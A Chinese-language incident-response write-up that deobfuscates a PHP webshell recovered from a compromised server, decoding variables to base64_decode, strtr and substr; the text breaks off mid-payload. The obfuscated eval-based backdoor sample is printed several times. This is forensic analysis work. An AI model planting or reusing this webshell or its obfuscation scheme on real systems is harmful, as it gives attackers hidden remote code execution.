对某次应急响应中webshell的分析

文章前言

在之前处理一起应急事件时发现攻击者在WEB应用目录下上传了webshell,但是webshell似乎使用了某种加密混淆手法,无法直观的看到其中的木马连接密码,而客户非要让我们连接webshell来证实此文件为后门文件且可执行和利用(也是很恼火,本来就结束了,还得分析webshell),遂对提取到的webshell进行解密分析操作看看到底其内容是什么以及看一下这个其中到底使用了那种加密混淆手法对webshell进行混淆处理

样本文件

从客户环境中提取的webshell样本文件如下所示:

样本分析

首先对木马文件进行格式化处理:

<?php 
define('HLPHNk0717',__FILE__);
$fBqGfZ=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZkxLeGNGT1ZrdHlYYmpXQkFwUURsTmVVSVN1SkV6ckN3Z1ladmlvc21QZGhIYXFSR1RuTQ==");
$KMoqeF=$fBqGfZ[3].$fBqGfZ[6].$fBqGfZ[33].$fBqGfZ[30];
$bBbJLf=$fBqGfZ[33].$fBqGfZ[10].$fBqGfZ[24].$fBqGfZ[10].$fBqGfZ[24];
$WgEkem=$bBbJLf[0].$fBqGfZ[18].$fBqGfZ[3].$bBbJLf[0].$bBbJLf[1].$fBqGfZ[24];
$eUgqfR=$fBqGfZ[7].$fBqGfZ[13];
$KMoqeF.=$fBqGfZ[22].$fBqGfZ[36].$fBqGfZ[29].$fBqGfZ[26].$fBqGfZ[30].$fBqGfZ[32].$fBqGfZ[35].$fBqGfZ[26].$fBqGfZ[30];
eval($KMoqeF("JEFNcVlmTj0iQVB5Tkx6YnJhZWlTQ3BHRVlrT2N2QnhkcXdabklzV2dSWEpNSGpEaHR1VWZsb1FtVkZUS3lNc0RRclRuQ1V3V0tZR0pQdmFScGdqZm14dWxGSGVaTFNBZGhvaWN6a1ZPTkVidFhJcUJNaTl4Q2h5WnVHWHRDZTVOQktmS0MzWVNxSUV4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2ZkdEUXVYTmNNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldnVIUnRMSVdvdXdDMDVrUFhjR2RYZkhDSmpxWDBZMHVHSGpSWHVuVk5Yd2RWNURWdGpHVEdYWGFYSW9MdllwUDJIMWVHWGhlb0RMWGVMR1hOZkdXMURocWxZd2JxMDlGd3Y3QWhnWVBWZmlYbzB2ZkdEUXVYTmNlckRmUXdMMFAwek5lZUlURE4wa0FoTG9XMlh1UFhIcmQxMGtBaExvVzJYdVBYSHJkSTA3QWhnQ2VlZmp1bzB2ZkdEUXVYTmNlcmRyU1c0dmZHRFF1WE5jZXJKeFNXNHZmR0RRdVhOY2VyRjBTVzR2ZkdEUXVYTmNlckp4U1c0dmZHRFF1WE5jZXJGMFNxSHZUMnpjdWVmY01XTHhlTk5sUmV1VGRJMGtBaExvVzJYdVBYSGphSTBrQWhMb1cyWHVQWEhyU1c0dlJJWXV1M0l0ZXJnZlF3THhlTk5sUmV1VGRYMGtBaExvVzJYdVBYSHNESTA3QWhmQVVsTmt1bzB2ZkdEUXVYTmNlcmZmUXdMMFAwek5lZUlUZHFEZmFzTHhDZUloYjFQa01XTDBQMHpOZWVJVGRvQWZRd0wwUDB6TmVlSVRkcnVmUXdMMFAwek5lZUlUZG9OZlF3TDBQMHpOZWVJVGRvdWZRd0wwUDB6TmVlSVRkcmdmUXdMMFAwek5lZUlUZHJBZlF3TDBQMHpOZWVJVGRyWGZRd0wwUDB6TmVlSVRkb3VmUXdMMFAwek5lZUlUZHJnZmEyWDJQZXhFQWhnWVBWZmlYd1p3V3ZjV1VHZHNUSVh1VW9nWVZyZ1dESXZqZXZ1d2QwNVlWWGZDZE5QeENHenZMZWpWVmUwMVZlRGVUSmNTVElBV1gwZkdMSUxQWE5nd1gzWjJQMGNIUnRJU0NKMUNkbGdNUDJ6Q2QxdVhSR2pYVGVjTFBYdXhESVhTVmxEV1hxTmVWMVIxZGVKeFZ0NVNYcUl1WEdqQkN0SWtlbGZvWFZZUWV0MUdYR1hYdUpOdUMwUDJQckFlZDJEblVKakxkZUwwWHZ1Q0wyRnJWdjlYTEdqWFYyNWVWSUxJRGVOYUxpZ1lxckFlZE5OU2YyOUJVb1puV2x2MEMyRGhUR2NXZEo1U1cwRFdmMWZIVEc1b1gxTnBXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNJRENlenJXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNEQldHTEJ1ZTVIZlhZWUMzREJMck5zZVhmZVROTnF1Mnp2V0p1NlBYdVdDdmpKYlNEQldHTEJ1ZTVIZlhZWUMzZ1FWMkgzRnd2WWFyOCtNaTl4Q2h5WnVHWHRDZTVOQktmbVJOTDBSaFB4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2dXZqSlhYWUpNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldlIxVUlmaHVpTHFkSUV4dWlES0xYVnhSSUlvZDJqclBlaldYMURHUmhBV2R0Y0RQb0FlTElBUGVOZ0NUZWo1WDFmQmIxTG5MTnV2WDA1QmVYdUJxdFhIdUlBd1ZxMDlGd3Y3QWhOcmIwakZicjB2dXZqSlhYWUplckRmUXdMdHFKTFhldkxURE4wa0FHdWRMSVhDTElIcmQxMGtBR3VkTElYQ0xJSHJkSTA3QUpOaXEyakdScjB2dXZqSlhYWUplcmRyU1c0dnV2akpYWFlKZXJKeFNXNHZ1dmpKWFhZSmVyRjBTVzR2dXZqSlhYWUplckp4U1c0dnV2akpYWFlKZXJGMFNxSHZldjFRVXYxSE1XTEFiMDlITGxEVGRJMGtBR3VkTElYQ0xJSGphSTBrQUd1ZExJWENMSUhyU1c0dldWRE1USnVyZXJnZlF3TEFiMDlITGxEVGRYMGtBR3VkTElYQ0xJSHNESTA3QUo5RlROZ2xXcjB2dXZqSlhYWUplcmZmUXdMdHFKTFhldkxUZHFEZmFzTDVSMERkV0pka01XTHRxSkxYZXZMVGRvQWZRd0x0cUpMWGV2TFRkcnVmUXdMdHFKTFhldkxUZG9OZlF3THRxSkxYZXZMVGRvdWZRd0x0cUpMWGV2TFRkcmdmUXdMdHFKTFhldkxUZHJBZlF3THRxSkxYZXZMVGRyWGZRd0x0cUpMWGV2TFRkb3VmUXdMdHFKTFhldkxUZHJnZmEyWDJQZXhFQWhOcmIwakZic1p3V3ZjRWRJZGpUSUF1WGlnWVBvSUhmMUxIVm9MU0xWWXFWWFhlTDFYaGV2NWVUSnVZWDIxeFVHQXpYb0RxTDJqUHVHenhMR1hQVnQ5Q2ROQURYaWd2VVhOUFJKWVdMM2JqUHZ1YVh0ZHNxbExxZFh1alBYZjRUWGZuRFNjVldHaktlb0lhcU5ZWHVpSVhYWEFTdWlJQlVOSWtib0F1ZGhMWGVlaktkSURHVEd6V1hySUJQMnpDZVhOU0NKemNkb3YwdWV6YWVHQW5hWExjTEdqaVZ0NUtEZUFoV2xYV1V2WWplcWdCWE51aFByWHZYMU40UHZjeENOWGhWdEllTEpYM1BYUmpiMDFJYVhMU0xJSjVXZVkwVEdMekxsRFFiMmRwVkdOb2ZWWUZUaFlMZGhjQVZTTmxDMURYcU5nd0xYWTZXMERXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqUUN2TnhxSkRXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqZGIxQWJWMFIxVlhFeFIzZ2RiMUFjWElYMEROTFNmMjlCV0daeFZySUhWTk5xZjNmZGIxQWJWMFIxVlhFeFIzZ1FWMnp4cTNSOU1XRllCcUgvTVo9PSI7ZXZhbCgnPz4nLiRLTW9xZUYoJGJCYkpMZigkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUioyKSwkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUiwkZVVncWZSKSwkV2dFa2VtKCRBTXFZZk4sMCwkZVVncWZSKSkpKTs="));?>

从上面可以看到这里执行了一次eval操作,同时eval里面还嵌套了一个变量,那么这个变量到底是什么,以及上面几个不规则的变量到底是什么意思呢?由于客户环境不能随意动,于是乎,直接开虚拟机在本地构建一个PHPstudy环境并将丢到WWW目录中在本地访问将内容其输出出来看看:

<?php 
define('HLPHNk0717',__FILE__);
$fBqGfZ=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZkxLeGNGT1ZrdHlYYmpXQkFwUURsTmVVSVN1SkV6ckN3Z1ladmlvc21QZGhIYXFSR1RuTQ==");
$KMoqeF=$fBqGfZ[3].$fBqGfZ[6].$fBqGfZ[33].$fBqGfZ[30];
$bBbJLf=$fBqGfZ[33].$fBqGfZ[10].$fBqGfZ[24].$fBqGfZ[10].$fBqGfZ[24];
$WgEkem=$bBbJLf[0].$fBqGfZ[18].$fBqGfZ[3].$bBbJLf[0].$bBbJLf[1].$fBqGfZ[24];
$eUgqfR=$fBqGfZ[7].$fBqGfZ[13];
$KMoqeF.=$fBqGfZ[22].$fBqGfZ[36].$fBqGfZ[29].$fBqGfZ[26].$fBqGfZ[30].$fBqGfZ[32].$fBqGfZ[35].$fBqGfZ[26].$fBqGfZ[30];
echo $KMoqeF.'<br>';
echo $bBbJLf.'<br>';
echo $WgEkem.'<br>';
echo $eUgqfR.'<br>';
//eval($KMoqeF("JEFNcVlmTj0iQVB5Tkx6YnJhZWlTQ3BHRVlrT2N2QnhkcXdabklzV2dSWEpNSGpEaHR1VWZsb1FtVkZUS3lNc0RRclRuQ1V3V0tZR0pQdmFScGdqZm14dWxGSGVaTFNBZGhvaWN6a1ZPTkVidFhJcUJNaTl4Q2h5WnVHWHRDZTVOQktmS0MzWVNxSUV4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2ZkdEUXVYTmNNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldnVIUnRMSVdvdXdDMDVrUFhjR2RYZkhDSmpxWDBZMHVHSGpSWHVuVk5Yd2RWNURWdGpHVEdYWGFYSW9MdllwUDJIMWVHWGhlb0RMWGVMR1hOZkdXMURocWxZd2JxMDlGd3Y3QWhnWVBWZmlYbzB2ZkdEUXVYTmNlckRmUXdMMFAwek5lZUlURE4wa0FoTG9XMlh1UFhIcmQxMGtBaExvVzJYdVBYSHJkSTA3QWhnQ2VlZmp1bzB2ZkdEUXVYTmNlcmRyU1c0dmZHRFF1WE5jZXJKeFNXNHZmR0RRdVhOY2VyRjBTVzR2ZkdEUXVYTmNlckp4U1c0dmZHRFF1WE5jZXJGMFNxSHZUMnpjdWVmY01XTHhlTk5sUmV1VGRJMGtBaExvVzJYdVBYSGphSTBrQWhMb1cyWHVQWEhyU1c0dlJJWXV1M0l0ZXJnZlF3THhlTk5sUmV1VGRYMGtBaExvVzJYdVBYSHNESTA3QWhmQVVsTmt1bzB2ZkdEUXVYTmNlcmZmUXdMMFAwek5lZUlUZHFEZmFzTHhDZUloYjFQa01XTDBQMHpOZWVJVGRvQWZRd0wwUDB6TmVlSVRkcnVmUXdMMFAwek5lZUlUZG9OZlF3TDBQMHpOZWVJVGRvdWZRd0wwUDB6TmVlSVRkcmdmUXdMMFAwek5lZUlUZHJBZlF3TDBQMHpOZWVJVGRyWGZRd0wwUDB6TmVlSVRkb3VmUXdMMFAwek5lZUlUZHJnZmEyWDJQZXhFQWhnWVBWZmlYd1p3V3ZjV1VHZHNUSVh1VW9nWVZyZ1dESXZqZXZ1d2QwNVlWWGZDZE5QeENHenZMZWpWVmUwMVZlRGVUSmNTVElBV1gwZkdMSUxQWE5nd1gzWjJQMGNIUnRJU0NKMUNkbGdNUDJ6Q2QxdVhSR2pYVGVjTFBYdXhESVhTVmxEV1hxTmVWMVIxZGVKeFZ0NVNYcUl1WEdqQkN0SWtlbGZvWFZZUWV0MUdYR1hYdUpOdUMwUDJQckFlZDJEblVKakxkZUwwWHZ1Q0wyRnJWdjlYTEdqWFYyNWVWSUxJRGVOYUxpZ1lxckFlZE5OU2YyOUJVb1puV2x2MEMyRGhUR2NXZEo1U1cwRFdmMWZIVEc1b1gxTnBXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNJRENlenJXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNEQldHTEJ1ZTVIZlhZWUMzREJMck5zZVhmZVROTnF1Mnp2V0p1NlBYdVdDdmpKYlNEQldHTEJ1ZTVIZlhZWUMzZ1FWMkgzRnd2WWFyOCtNaTl4Q2h5WnVHWHRDZTVOQktmbVJOTDBSaFB4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2dXZqSlhYWUpNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldlIxVUlmaHVpTHFkSUV4dWlES0xYVnhSSUlvZDJqclBlaldYMURHUmhBV2R0Y0RQb0FlTElBUGVOZ0NUZWo1WDFmQmIxTG5MTnV2WDA1QmVYdUJxdFhIdUlBd1ZxMDlGd3Y3QWhOcmIwakZicjB2dXZqSlhYWUplckRmUXdMdHFKTFhldkxURE4wa0FHdWRMSVhDTElIcmQxMGtBR3VkTElYQ0xJSHJkSTA3QUpOaXEyakdScjB2dXZqSlhYWUplcmRyU1c0dnV2akpYWFlKZXJKeFNXNHZ1dmpKWFhZSmVyRjBTVzR2dXZqSlhYWUplckp4U1c0dnV2akpYWFlKZXJGMFNxSHZldjFRVXYxSE1XTEFiMDlITGxEVGRJMGtBR3VkTElYQ0xJSGphSTBrQUd1ZExJWENMSUhyU1c0dldWRE1USnVyZXJnZlF3TEFiMDlITGxEVGRYMGtBR3VkTElYQ0xJSHNESTA3QUo5RlROZ2xXcjB2dXZqSlhYWUplcmZmUXdMdHFKTFhldkxUZHFEZmFzTDVSMERkV0pka01XTHRxSkxYZXZMVGRvQWZRd0x0cUpMWGV2TFRkcnVmUXdMdHFKTFhldkxUZG9OZlF3THRxSkxYZXZMVGRvdWZRd0x0cUpMWGV2TFRkcmdmUXdMdHFKTFhldkxUZHJBZlF3THRxSkxYZXZMVGRyWGZRd0x0cUpMWGV2TFRkb3VmUXdMdHFKTFhldkxUZHJnZmEyWDJQZXhFQWhOcmIwakZic1p3V3ZjRWRJZGpUSUF1WGlnWVBvSUhmMUxIVm9MU0xWWXFWWFhlTDFYaGV2NWVUSnVZWDIxeFVHQXpYb0RxTDJqUHVHenhMR1hQVnQ5Q2ROQURYaWd2VVhOUFJKWVdMM2JqUHZ1YVh0ZHNxbExxZFh1alBYZjRUWGZuRFNjVldHaktlb0lhcU5ZWHVpSVhYWEFTdWlJQlVOSWtib0F1ZGhMWGVlaktkSURHVEd6V1hySUJQMnpDZVhOU0NKemNkb3YwdWV6YWVHQW5hWExjTEdqaVZ0NUtEZUFoV2xYV1V2WWplcWdCWE51aFByWHZYMU40UHZjeENOWGhWdEllTEpYM1BYUmpiMDFJYVhMU0xJSjVXZVkwVEdMekxsRFFiMmRwVkdOb2ZWWUZUaFlMZGhjQVZTTmxDMURYcU5nd0xYWTZXMERXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqUUN2TnhxSkRXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqZGIxQWJWMFIxVlhFeFIzZ2RiMUFjWElYMEROTFNmMjlCV0daeFZySUhWTk5xZjNmZGIxQWJWMFIxVlhFeFIzZ1FWMnp4cTNSOU1XRllCcUgvTVo9PSI7ZXZhbCgnPz4nLiRLTW9xZUYoJGJCYkpMZigkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUioyKSwkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUiwkZVVncWZSKSwkV2dFa2VtKCRBTXFZZk4sMCwkZVVncWZSKSkpKTs="));
?>

由此可以将上面的随机名称变量和具体的函数/操作进行对标:

$KMoqeF.'<br>';             base64_decode
$bBbJLf.'<br>';             strtr
$WgEkem.'<br>';             substr
$eUgqfR.'<br>';             52

可以看到这里的$KMoqeF为"base64_decode",随后我们将eval改为echo并直接进行一次输出看看到底执行了base64解码之后的什么内容:

<?php 
define('HLPHNk0717',__FILE__);
$fBqGfZ=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZkxLeGNGT1ZrdHlYYmpXQkFwUURsTmVVSVN1SkV6ckN3Z1ladmlvc21QZGhIYXFSR1RuTQ==");
$KMoqeF=$fBqGfZ[3].$fBqGfZ[6].$fBqGfZ[33].$fBqGfZ[30];
$bBbJLf=$fBqGfZ[33].$fBqGfZ[10].$fBqGfZ[24].$fBqGfZ[10].$fBqGfZ[24];
$WgEkem=$bBbJLf[0].$fBqGfZ[18].$fBqGfZ[3].$bBbJLf[0].$bBbJLf[1].$fBqGfZ[24];
$eUgqfR=$fBqGfZ[7].$fBqGfZ[13];
$KMoqeF.=$fBqGfZ[22].$fBqGfZ[36].$fBqGfZ[29].$fBqGfZ[26].$fBqGfZ[30].$fBqGfZ[32].$fBqGfZ[35].$fBqGfZ[26].$fBqGfZ[30];
echo $KMoqeF.'<br>';
echo $bBbJLf.'<br>';
echo $WgEkem.'<br>';
echo $eUgqfR.'<br>';
echo($KMoqeF("JEFNcVlmTj0iQVB5Tkx6YnJhZWlTQ3BHRVlrT2N2QnhkcXdabklzV2dSWEpNSGpEaHR1VWZsb1FtVkZUS3lNc0RRclRuQ1V3V0tZR0pQdmFScGdqZm14dWxGSGVaTFNBZGhvaWN6a1ZPTkVidFhJcUJNaTl4Q2h5WnVHWHRDZTVOQktmS0MzWVNxSUV4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2ZkdEUXVYTmNNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldnVIUnRMSVdvdXdDMDVrUFhjR2RYZkhDSmpxWDBZMHVHSGpSWHVuVk5Yd2RWNURWdGpHVEdYWGFYSW9MdllwUDJIMWVHWGhlb0RMWGVMR1hOZkdXMURocWxZd2JxMDlGd3Y3QWhnWVBWZmlYbzB2ZkdEUXVYTmNlckRmUXdMMFAwek5lZUlURE4wa0FoTG9XMlh1UFhIcmQxMGtBaExvVzJYdVBYSHJkSTA3QWhnQ2VlZmp1bzB2ZkdEUXVYTmNlcmRyU1c0dmZHRFF1WE5jZXJKeFNXNHZmR0RRdVhOY2VyRjBTVzR2ZkdEUXVYTmNlckp4U1c0dmZHRFF1WE5jZXJGMFNxSHZUMnpjdWVmY01XTHhlTk5sUmV1VGRJMGtBaExvVzJYdVBYSGphSTBrQWhMb1cyWHVQWEhyU1c0dlJJWXV1M0l0ZXJnZlF3THhlTk5sUmV1VGRYMGtBaExvVzJYdVBYSHNESTA3QWhmQVVsTmt1bzB2ZkdEUXVYTmNlcmZmUXdMMFAwek5lZUlUZHFEZmFzTHhDZUloYjFQa01XTDBQMHpOZWVJVGRvQWZRd0wwUDB6TmVlSVRkcnVmUXdMMFAwek5lZUlUZG9OZlF3TDBQMHpOZWVJVGRvdWZRd0wwUDB6TmVlSVRkcmdmUXdMMFAwek5lZUlUZHJBZlF3TDBQMHpOZWVJVGRyWGZRd0wwUDB6TmVlSVRkb3VmUXdMMFAwek5lZUlUZHJnZmEyWDJQZXhFQWhnWVBWZmlYd1p3V3ZjV1VHZHNUSVh1VW9nWVZyZ1dESXZqZXZ1d2QwNVlWWGZDZE5QeENHenZMZWpWVmUwMVZlRGVUSmNTVElBV1gwZkdMSUxQWE5nd1gzWjJQMGNIUnRJU0NKMUNkbGdNUDJ6Q2QxdVhSR2pYVGVjTFBYdXhESVhTVmxEV1hxTmVWMVIxZGVKeFZ0NVNYcUl1WEdqQkN0SWtlbGZvWFZZUWV0MUdYR1hYdUpOdUMwUDJQckFlZDJEblVKakxkZUwwWHZ1Q0wyRnJWdjlYTEdqWFYyNWVWSUxJRGVOYUxpZ1lxckFlZE5OU2YyOUJVb1puV2x2MEMyRGhUR2NXZEo1U1cwRFdmMWZIVEc1b1gxTnBXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNJRENlenJXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNEQldHTEJ1ZTVIZlhZWUMzREJMck5zZVhmZVROTnF1Mnp2V0p1NlBYdVdDdmpKYlNEQldHTEJ1ZTVIZlhZWUMzZ1FWMkgzRnd2WWFyOCtNaTl4Q2h5WnVHWHRDZTVOQktmbVJOTDBSaFB4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2dXZqSlhYWUpNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldlIxVUlmaHVpTHFkSUV4dWlES0xYVnhSSUlvZDJqclBlaldYMURHUmhBV2R0Y0RQb0FlTElBUGVOZ0NUZWo1WDFmQmIxTG5MTnV2WDA1QmVYdUJxdFhIdUlBd1ZxMDlGd3Y3QWhOcmIwakZicjB2dXZqSlhYWUplckRmUXdMdHFKTFhldkxURE4wa0FHdWRMSVhDTElIcmQxMGtBR3VkTElYQ0xJSHJkSTA3QUpOaXEyakdScjB2dXZqSlhYWUplcmRyU1c0dnV2akpYWFlKZXJKeFNXNHZ1dmpKWFhZSmVyRjBTVzR2dXZqSlhYWUplckp4U1c0dnV2akpYWFlKZXJGMFNxSHZldjFRVXYxSE1XTEFiMDlITGxEVGRJMGtBR3VkTElYQ0xJSGphSTBrQUd1ZExJWENMSUhyU1c0dldWRE1USnVyZXJnZlF3TEFiMDlITGxEVGRYMGtBR3VkTElYQ0xJSHNESTA3QUo5RlROZ2xXcjB2dXZqSlhYWUplcmZmUXdMdHFKTFhldkxUZHFEZmFzTDVSMERkV0pka01XTHRxSkxYZXZMVGRvQWZRd0x0cUpMWGV2TFRkcnVmUXdMdHFKTFhldkxUZG9OZlF3THRxSkxYZXZMVGRvdWZRd0x0cUpMWGV2TFRkcmdmUXdMdHFKTFhldkxUZHJBZlF3THRxSkxYZXZMVGRyWGZRd0x0cUpMWGV2TFRkb3VmUXdMdHFKTFhldkxUZHJnZmEyWDJQZXhFQWhOcmIwakZic1p3V3ZjRWRJZGpUSUF1WGlnWVBvSUhmMUxIVm9MU0xWWXFWWFhlTDFYaGV2NWVUSnVZWDIxeFVHQXpYb0RxTDJqUHVHenhMR1hQVnQ5Q2ROQURYaWd2VVhOUFJKWVdMM2JqUHZ1YVh0ZHNxbExxZFh1alBYZjRUWGZuRFNjVldHaktlb0lhcU5ZWHVpSVhYWEFTdWlJQlVOSWtib0F1ZGhMWGVlaktkSURHVEd6V1hySUJQMnpDZVhOU0NKemNkb3YwdWV6YWVHQW5hWExjTEdqaVZ0NUtEZUFoV2xYV1V2WWplcWdCWE51aFByWHZYMU40UHZjeENOWGhWdEllTEpYM1BYUmpiMDFJYVhMU0xJSjVXZVkwVEdMekxsRFFiMmRwVkdOb2ZWWUZUaFlMZGhjQVZTTmxDMURYcU5nd0xYWTZXMERXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqUUN2TnhxSkRXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqZGIxQWJWMFIxVlhFeFIzZ2RiMUFjWElYMEROTFNmMjlCV0daeFZySUhWTk5xZjNmZGIxQWJWMFIxVlhFeFIzZ1FWMnp4cTNSOU1XRllCcUgvTVo9PSI7ZXZhbCgnPz4nLiRLTW9xZUYoJGJCYkpMZigkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUioyKSwkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUiwkZVVncWZSKSwkV2dFa2VtKCRBTXFZZk4sMCwkZVVncWZSKSkpKTs="));
?>


从上面我们可以看到输出的内容中有一串eval执行的内容,其中的变量正好是我们上面echo出来的内容,随后我们进行替换操作,替换后结果如下所示:

<?php 
$AMqYfN="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